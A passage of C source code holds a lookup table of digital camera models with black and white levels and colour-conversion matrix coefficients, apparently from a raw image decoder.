{ "Canon IXUS 160", 0, 0, /* DJC */
{ 11657,-3781,-1136,-3544,11262,2283,-160,1219,4700 } },
{ "Casio EX-S20", 0, 0, /* DJC */
{ 11634,-3924,-1128,-4968,12954,2015,-1588,2648,7206 } },
{ "Casio EX-Z750", 0, 0, /* DJC */
{ 10819,-3873,-1099,-4903,13730,1175,-1755,3751,4632 } },
{ "Casio EX-Z10", 128, 0xfff, /* DJC */
{ 9790,-3338,-603,-2321,10222,2099,-344,1273,4799 } },
{ "CINE 650", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE 660", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE", 0, 0,
{ 20183,-4295,-423,-3940,15330,3985,-280,4870,9800 } },
{ "Contax N Digital", 0, 0xf1e,
{ 7777,1285,-1053,-9280,16543,2916,-3677,5679,7060 } },
{ "DXO ONE", 0, 0,
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Epson R-D1", 0, 0,
{ 6827,-1878,-732,-8429,16012,2564,-704,592,7145 } },
{ "Fujifilm E550", 0, 0,
{ 11044,-3888,-1120,-7248,15168,2208,-1531,2277,8069 } },
{ "Fujifilm E900", 0, 0,
{ 9183,-2526,-1078,-7461,15071,2574,-2022,2440,8639 } },
{ "Fujifilm F5", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F6", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F77", 0, 0xfe9,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F7", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm F8", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm S100FS", 514, 0,
{ 11521,-4355,-1065,-6524,13767,3058,-1466,1984,6045 } },
{ "Fujifilm S1", 0, 0,
{ 12297,-4882,-1202,-2106,10691,1623,-88,1312,4790 } },
{ "Fujifilm S20Pro", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm S20", 512, 0x3fff,
{ 11401,-4498,-1312,-5088,12751,2613,-838,1568,5941 } },
{ "Fujifilm S2Pro", 128, 0,
{ 12492,-4690,-1402,-7033,15423,1647,-1507,2111,7697 } },
{ "Fujifilm S3Pro", 0, 0,
{ 11807,-4612,-1294,-8927,16968,1988,-2120,2741,8006 } },
{ "Fujifilm S5Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm S5000", 0, 0,
{ 8754,-2732,-1019,-7204,15069,2276,-1702,2334,6982 } },
{ "Fujifilm S5100", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5500", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5200", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S5600", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S6", 0, 0,
{ 12628,-4887,-1401,-6861,14996,1962,-2198,2782,7091 } },
{ "Fujifilm S7000", 0, 0,
{ 10190,-3506,-1312,-7153,15051,2238,-2003,2399,7505 } },
{ "Fujifilm S9000", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9500", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9100", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm S9600", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm SL1000", 0, 0,
{ 11705,-4262,-1107,-2282,10791,1709,-555,1713,4945 } },
{ "Fujifilm IS-1", 0, 0,
{ 21461,-10807,-1441,-2332,10599,1999,289,875,7703 } },
{ "Fujifilm IS Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm HS10 HS11", 0, 0xf68,
{ 12440,-3954,-1183,-1123,9674,1708,-83,1614,4086 } },
{ "Fujifilm HS2", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS3", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS50EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm F900EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm X100S", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100T", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100", 0, 0,
{ 12161,-4457,-1069,-5034,12874,2400,-795,1724,6904 } },
{ "Fujifilm X10", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X20", 0, 0,
{ 11768,-4971,-1133,-4904,12927,2183,-480,1723,4605 } },
{ "Fujifilm X30", 0, 0,
{ 12328,-5256,-1144,-4469,12927,1675,-87,1291,4351 } },
{ "Fujifilm X70", 0, 0,
{ 10450,-4329,-878,-3217,11105,2421,-752,1758,6519 } },
{ "Fujifilm X-Pro1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-Pro2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm X-A1", 0, 0,
{ 11086,-4555,-839,-3512,11310,2517,-815,1341,5940 } },
{ "Fujifilm X-A2", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-E1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-E2S", 0, 0,
{ 11562,-5118,-961,-3022,11007,2311,-525,1569,6097 } },
{ "Fujifilm X-E2", 0, 0,
{ 12066,-5927,-367,-1969,9878,1503,-721,2034,5453 } },
{ "Fujifilm XF1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-M1", 0, 0,
{ 13193,-6685,-425,-2229,10458,1534,-878,1763,5217 } },
{ "Fujifilm X-S1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-T10", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-T1", 0, 0,
{ 8458,-2451,-855,-4597,12447,2407,-1475,2482,6526 } },
{ "Fujifilm X-T2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm XQ1", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "Fujifilm XQ2", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "GITUP GIT2", 3200, 0,
{8489, -2583,-1036,-8051,15583,2643,-1307,1407,7354}},
{ "Hasselblad Lunar", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Hasselblad Stellar", -800, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Hasselblad CFV", 0, 0, /* Adobe */
{ 8519, -3260, -280, -5081, 13459, 1738, -1449, 2960, 7809, } },
{ "Hasselblad H-16MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-22MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-31MP",0, 0, /* LibRaw */
{ 14480,-5448,-1686,-3534,13123,2260,384,2952,7232 } },
{ "Hasselblad H-39MP",0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H3D-50", 0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H4D-40",0, 0, /* LibRaw */
{ 6325,-860,-957,-6559,15945,266,167,770,5936 } },
{ "Hasselblad H4D-50",0, 0, /* LibRaw */
{ 15283,-6272,-465,-2030,16031,478,-2379,390,7965 } },
{ "Hasselblad H4D-60",0, 0, /* Adobe */
{ 9662, -684, -279, -4903, 12293, 2950, -344, 1669, 6024 } },
{ "Hasselblad H5D-50c",0, 0, /* Adobe */
{ 4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 } },
{ "Hasselblad H5D-50",0, 0, /* Adobe */
{ 5656, -659, -346, -3923, 12306, 1791, -1602, 3509, 5442 } },
{ "Hasselblad X1D",0, 0, /* Adobe */
{4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 }},
{ "HTC One A9", 64, 1023, /* this is CM1 transposed */
{ 101, -20, -2, -11, 145, 41, -24, 1, 56 } },
{ "Imacon Ixpress", 0, 0, /* DJC */
{ 7025,-1415,-704,-5188,13765,1424,-1248,2742,6038 } },
{ "Kodak NC2000", 0, 0,
{ 13891,-6055,-803,-465,9919,642,2121,82,1291 } },
{ "Kodak DCS315C", -8, 0,
{ 17523,-4827,-2510,756,8546,-137,6113,1649,2250 } },
{ "Kodak DCS330C", -8, 0,
{ 20620,-7572,-2801,-103,10073,-396,3551,-233,2220 } },
{ "Kodak DCS420", 0, 0,
{ 10868,-1852,-644,-1537,11083,484,2343,628,2216 } },
{ "Kodak DCS460", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS1", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS3B", 0, 0,
{ 9898,-2700,-940,-2478,12219,206,1985,634,1031 } },
{ "Kodak DCS520C", -178, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Kodak DCS560C", -177, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Kodak DCS620C", -177, 0,
{ 23617,-10175,-3149,-2054,11749,-272,2586,-489,3453 } },
{ "Kodak DCS620X", -176, 0,
{ 13095,-6231,154,12221,-21,-2137,895,4602,2258 } },
{ "Kodak DCS660C", -173, 0,
{ 18244,-6351,-2739,-791,11193,-521,3711,-129,2802 } },
{ "Kodak DCS720X", 0, 0,
{ 11775,-5884,950,9556,1846,-1286,-1019,6221,2728 } },
{ "Kodak DCS760C", 0, 0,
{ 16623,-6309,-1411,-4344,13923,323,2285,274,2926 } },
{ "Kodak DCS Pro SLR", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14nx", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14", 0, 0,
{ 7791,3128,-776,-8588,16458,2039,-2455,4006,6198 } },
{ "Kodak ProBack645", 0, 0,
{ 16414,-6060,-1470,-3555,13037,473,2545,122,4948 } },
{ "Kodak ProBack", 0, 0,
{ 21179,-8316,-2918,-915,11019,-165,3477,-180,4210 } },
{ "Kodak P712", 0, 0,
{ 9658,-3314,-823,-5163,12695,2768,-1342,1843,6044 } },
{ "Kodak P850", 0, 0xf7c,
{ 10511,-3836,-1102,-6946,14587,2558,-1481,1792,6246 } },
{ "Kodak P880", 0, 0xfff,
{ 12805,-4662,-1376,-7480,15267,2360,-1626,2194,7904 } },
{ "Kodak EasyShare Z980", 0, 0,
{ 11313,-3559,-1101,-3893,11891,2257,-1214,2398,4908 } },
{ "Kodak EasyShare Z981", 0, 0,
{ 12729,-4717,-1188,-1367,9187,2582,274,860,4411 } },
{ "Kodak EasyShare Z990", 0, 0xfed,
{ 11749,-4048,-1309,-1867,10572,1489,-138,1449,4522 } },
{ "Kodak EASYSHARE Z1015", 0, 0xef1,
{ 11265,-4286,-992,-4694,12343,2647,-1090,1523,5447 } },
{ "Leaf CMost", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Valeo 6", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Aptus 54S", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Leaf Aptus 65", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Aptus 75", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Credo 40", 0, 0,
{ 8035, 435, -962, -6001, 13872, 2320, -1159, 3065, 5434 } },
{ "Leaf Credo 50", 0, 0,
{ 3984, 0, 0, 0, 10000, 0, 0, 0, 7666 } },
{ "Leaf Credo 60", 0, 0,
{ 8035, 435, -962, -6001, 13872,2320,-1159,3065,5434 } },
{ "Leaf Credo 80", 0, 0,
{ 6294, 686, -712, -5435, 13417, 2211, -1006, 2435, 5042 } },
{ "Leaf", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Mamiya ZD", 0, 0,
{ 7645,2579,-1363,-8689,16717,2015,-3712,5941,5961 } },
{ "Micron 2010", 110, 0, /* DJC */
{ 16695,-3761,-2151,155,9682,163,3433,951,4904 } },
{ "Minolta DiMAGE 5", 0, 0xf7d,
{ 8983,-2942,-963,-6556,14476,2237,-2426,2887,8014 } },
{ "Minolta DiMAGE 7Hi", 0, 0xf7d,
{ 11368,-3894,-1242,-6521,14358,2339,-2475,3056,7285 } },
{ "Minolta DiMAGE 7", 0, 0xf7d,
{ 9144,-2777,-998,-6676,14556,2281,-2470,3019,7744 } },
{ "Minolta DiMAGE A1", 0, 0xf8b,
{ 9274,-2547,-1167,-8220,16323,1943,-2273,2720,8340 } },
{ "Minolta DiMAGE A200", 0, 0,
{ 8560,-2487,-986,-8112,15535,2771,-1209,1324,7743 } },
{ "Minolta DiMAGE A2", 0, 0xf8f,
{ 9097,-2726,-1053,-8073,15506,2762,-966,981,7763 } },
{ "Minolta DiMAGE Z2", 0, 0, /* DJC */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Minolta DYNAX 5", 0, 0xffb,
{ 10284,-3283,-1086,-7957,15762,2316,-829,882,6644 } },
{ "Minolta DYNAX 7", 0, 0xffb,
{ 10239,-3104,-1099,-8037,15727,2451,-927,925,6871 } },
{ "Motorola PIXL", 0, 0, /* DJC */
{ 8898,-989,-1033,-3292,11619,1674,-661,3178,5216 } },
{ "Nikon D100", 0, 0,
{ 5902,-933,-782,-8983,16719,2354,-1402,1455,6464 } },
{ "Nikon D1H", 0, 0,
{ 7577,-2166,-926,-7454,15592,1934,-2377,2808,8606 } },
{ "Nikon D1X", 0, 0,
{ 7702,-2245,-975,-9114,17242,1875,-2679,3055,8521 } },
{ "Nikon D1", 0, 0, /* multiplied by 2.218750, 1.0, 1.148438 */
{ 16772,-4726,-2141,-7611,15713,1972,-2846,3494,9521 } },
{ "Nikon D200", 0, 0xfbc,
{ 8367,-2248,-763,-8758,16447,2422,-1527,1550,8053 } },
{ "Nikon D2H", 0, 0,
{ 5710,-901,-615,-8594,16617,2024,-2975,4120,6830 } },
{ "Nikon D2X", 0, 0,
{ 10231,-2769,-1255,-8301,15900,2552,-797,680,7148 } },
{ "Nikon D3000", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D3100", 0, 0,
{ 7911,-2167,-813,-5327,13150,2408,-1288,2483,7968 } },
{ "Nikon D3200", 0, 0xfb9,
{ 7013,-1408,-635,-5268,12902,2640,-1470,2801,7379 } },
{ "Nikon D3300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D3400", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D300", 0, 0,
{ 9030,-1992,-715,-8465,16302,2255,-2689,3217,8069 } },
{ "Nikon D3X", 0, 0,
{ 7171,-1986,-648,-8085,15555,2718,-2170,2512,7457 } },
{ "Nikon D3S", 0, 0,
{ 8828,-2406,-694,-4874,12603,2541,-660,1509,7587 } },
{ "Nikon D3", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D40X", 0, 0,
{ 8819,-2543,-911,-9025,16928,2151,-1329,1213,8449 } },
{ "Nikon D40", 0, 0,
{ 6992,-1668,-806,-8138,15748,2543,-874,850,7897 } },
{ "Nikon D4S", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D4", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon Df", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D5000", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2433,2826,8064 } },
{ "Nikon D5100", 0, 0x3de6,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D5200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D5300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D5500", 0, 0,
{ 8821,-2938,-785,-4178,12142,2287,-824,1651,6860 } },
{ "Nikon D500", 0, 0,
{ 8813,-3210,-1036,-4703,12868,2021,-1054,1940,6129 } },
{ "Nikon D50", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D5", 0, 0,
{ 9200,-3522,-992,-5755,13803,2117,-753,1486,6338 } },
{ "Nikon D600", 0, 0x3e07,
{ 8178,-2245,-609,-4857,12394,2776,-1207,2086,7298 } },
{ "Nikon D610",0, 0,
{ 10426,-4005,-444,-3565,11764,1403,-1206,2266,6549 } },
{ "Nikon D60", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D7000", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D7100", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D7200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D750", -600, 0,
{ 9020,-2890,-715,-4535,12436,2348,-934,1919,7086 } },
{ "Nikon D700", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D70", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D810A", 0, 0,
{ 11973, -5685, -888, -1965, 10326, 1901, -115, 1123, 7169 } },
{ "Nikon D810", 0, 0,
{ 9369,-3195,-791,-4488,12430,2301,-893,1796,6872 } },
{ "Nikon D800", 0, 0,
{ 7866,-2108,-555,-4869,12483,2681,-1176,2069,7501 } },
{ "Nikon D80", 0, 0,
{ 8629,-2410,-883,-9055,16940,2171,-1490,1363,8520 } },
{ "Nikon D90", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2434,2826,8064 } },
{ "Nikon E700", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E800", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E950", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E995", 0, 0, /* copied from E5000 */
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E2100", 0, 0, /* copied from Z2, new white balance */
{ 13142,-4152,-1596,-4655,12374,2282,-1769,2696,6711 } },
{ "Nikon E2500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E3200", 0, 0, /* DJC */
{ 9846,-2085,-1019,-3278,11109,2170,-774,2134,5745 } },
{ "Nikon E4300", 0, 0, /* copied from Minolta DiMAGE Z2 */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Nikon E4500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5000", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5400", 0, 0,
{ 9349,-2987,-1001,-7919,15766,2266,-2098,2680,6839 } },
{ "Nikon E5700", 0, 0,
{ -5368,11478,2368,5537,-113,3148,-4969,10021,5782,778,9028,211 } },
{ "Nikon E8400", 0, 0,
{ 7842,-2320,-992,-8154,15718,2599,-1098,1342,7560 } },
{ "Nikon E8700", 0, 0,
{ 8489,-2583,-1036,-8051,15583,2643,-1307,1407,7354 } },
{ "Nikon E8800", 0, 0,
{ 7971,-2314,-913,-8451,15762,2894,-1442,1520,7610 } },
{ "Nikon COOLPIX A", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon COOLPIX B700", 0, 0,
{ 14387,-6014,-1299,-1357,9975,1616,467,1047,4744 } },
{ "Nikon COOLPIX P330", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P340", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P6000", 0, 0,
{ 9698,-3367,-914,-4706,12584,2368,-837,968,5801 } },
{ "Nikon COOLPIX P7000", 0, 0,
{ 11432,-3679,-1111,-3169,11239,2202,-791,1380,4455 } },
{ "Nikon COOLPIX P7100", 0, 0,
{ 11053,-4269,-1024,-1976,10182,2088,-526,1263,4469 } },
{ "Nikon COOLPIX P7700", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P7800", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon 1 V3", -200, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J4", 0, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J5", 0, 0,
{ 7520,-2518,-645,-3844,12102,1945,-913,2249,6835} },
{ "Nikon 1 S2", -200, 0,
{ 6612,-1342,-618,-3338,11055,2623,-174,1792,5075 } },
{ "Nikon 1 V2", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 J3", 0, 0,
{ 8144,-2671,-473,-1740,9834,1601,-58,1971,4296 } },
{ "Nikon 1 AW1", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 ", 0, 0, /* J1, J2, S1, V1 */
{ 8994,-2667,-865,-4594,12324,2552,-699,1786,6260 } },
{ "Olympus AIR-A01", 0, 0xfe1,
{ 8992,-3093,-639,-2563,10721,2122,-437,1270,5473 } },
{ "Olympus C5050", 0, 0,
{ 10508,-3124,-1273,-6079,14294,1901,-1653,2306,6237 } },
{ "Olympus C5060", 0, 0,
{ 10445,-3362,-1307,-7662,15690,2058,-1135,1176,7602 } },
{ "Olympus C7070", 0, 0,
{ 10252,-3531,-1095,-7114,14850,2436,-1451,1723,6365 } },
{ "Olympus C70", 0, 0,
{ 10793,-3791,-1146,-7498,15177,2488,-1390,1577,7321 } },
{ "Olympus C80", 0, 0,
{ 8606,-2509,-1014,-8238,15714,2703,-942,979,7760 } },
{ "Olympus E-10", 0, 0xffc,
{ 12745,-4500,-1416,-6062,14542,1580,-1934,2256,6603 } },
{ "Olympus E-1", 0, 0,
{ 11846,-4767,-945,-7027,15878,1089,-2699,4122,8311 } },
{ "Olympus E-20", 0, 0xffc,
{ 13173,-4732,-1499,-5807,14036,1895,-2045,2452,7142 } },
{ "Olympus E-300", 0, 0,
{ 7828,-1761,-348,-5788,14071,1830,-2853,4518,6557 } },
{ "Olympus E-330", 0, 0,
{ 8961,-2473,-1084,-7979,15990,2067,-2319,3035,8249 } },
{ "Olympus E-30", 0, 0xfbc,
{ 8144,-1861,-1111,-7763,15894,1929,-1865,2542,7607 } },
{ "Olympus E-3", 0, 0xf99,
{ 9487,-2875,-1115,-7533,15606,2010,-1618,2100,7389 } },
{ "Olympus E-400", 0, 0,
{ 6169,-1483,-21,-7107,14761,2536,-2904,3580,8568 } },
{ "Olympus E-410", 0, 0xf6a,
{ 8856,-2582,-1026,-7761,15766,2082,-2009,2575,7469 } },
{ "Olympus E-420", 0, 0xfd7,
{ 8746,-2425,-1095,-7594,15612,2073,-1780,2309,7416 } },
{ "Olympus E-450", 0, 0xfd2,
{ 8745,-2425,-1095,-7594,15613,2073,-1780,2309,7416 } },
{ "Olympus E-500", 0, 0,
{ 8136,-1968,-299,-5481,13742,1871,-2556,4205,6630 } },
{ "Olympus E-510", 0, 0xf6a,
{ 8785,-2529,-1033,-7639,15624,2112,-1783,2300,7817 } },
{ "Olympus E-520", 0, 0xfd2,
{ 8344,-2322,-1020,-7596,15635,2048,-1748,2269,7287 } },
{ "Olympus E-5", 0, 0xeec,
{ 11200,-3783,-1325,-4576,12593,2206,-695,1742,7504 } },
{ "Olympus E-600", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-620", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-P1", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P2", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-P5", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL1s", 0, 0,
{ 11409,-3872,-1393,-4572,12757,2003,-709,1810,7415 } },
{ "Olympus E-PL1", 0, 0,
{ 11408,-4289,-1215,-4286,12385,2118,-387,1467,7787 } },
{ "Olympus E-PL2", 0, 0xcf3,
{ 15030,-5552,-1806,-3987,12387,1767,-592,1670,7023 } },
{ "Olympus E-PL3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PL5", 0, 0xfcb,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL6", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL7", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PL8", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PM1", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PM2", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M10", 0, 0, /* Same for E-M10MarkII */
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M1MarkII", 0, 0, /* Adobe */
{ 8380, -2630, -639, -2887, 10725, 2496, -627, 1427, 5438 }},
{ "Olympus E-M1", 0, 0,
{ 7687,-1984,-606,-4327,11928,2721,-1381,2339,6452 } },
{ "Olympus E-M5MarkII", 0, 0,
{ 9422,-3258,-711,-2655,10898,2015,-512,1354,5512 } },
{ "Olympus E-M5", 0, 0xfe1,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus PEN-F",0, 0,
{ 9476,-3182,-765,-2613,10958,1893,-449,1315,5268 } },
{ "Olympus SP350", 0, 0,
{ 12078,-4836,-1069,-6671,14306,2578,-786,939,7418 } },
{ "Olympus SP3", 0, 0,
{ 11766,-4445,-1067,-6901,14421,2707,-1029,1217,7572 } },
{ "Olympus SP500UZ", 0, 0xfff,
{ 9493,-3415,-666,-5211,12334,3260,-1548,2262,6482 } },
{ "Olympus SP510UZ", 0, 0xffe,
{ 10593,-3607,-1010,-5881,13127,3084,-1200,1805,6721 } },
{ "Olympus SP550UZ", 0, 0xffe,
{ 11597,-4006,-1049,-5432,12799,2957,-1029,1750,6516 } },
{ "Olympus SP560UZ", 0, 0xff9,
{ 10915,-3677,-982,-5587,12986,2911,-1168,1968,6223 } },
{ "Olympus SP570UZ", 0, 0,
{ 11522,-4044,-1146,-4736,12172,2904,-988,1829,6039 } },
{ "Olympus SH-2", 0, 0,
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus SH-3", 0, 0, /* Alias of SH-2 */
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus STYLUS1",0, 0,
{ 11976,-5518,-545,-1419,10472,846,-475,1766,4524 } },
{ "Olympus TG-4", 0, 0,
{ 11426,-4159,-1126,-2066,10678,1593,-120,1327,4998 } },
{ "Olympus XZ-10", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "Olympus XZ-1", 0, 0,
{ 10901,-4095,-1074,-1141,9208,2293,-62,1417,5158 } },
{ "Olympus XZ-2", 0, 0,
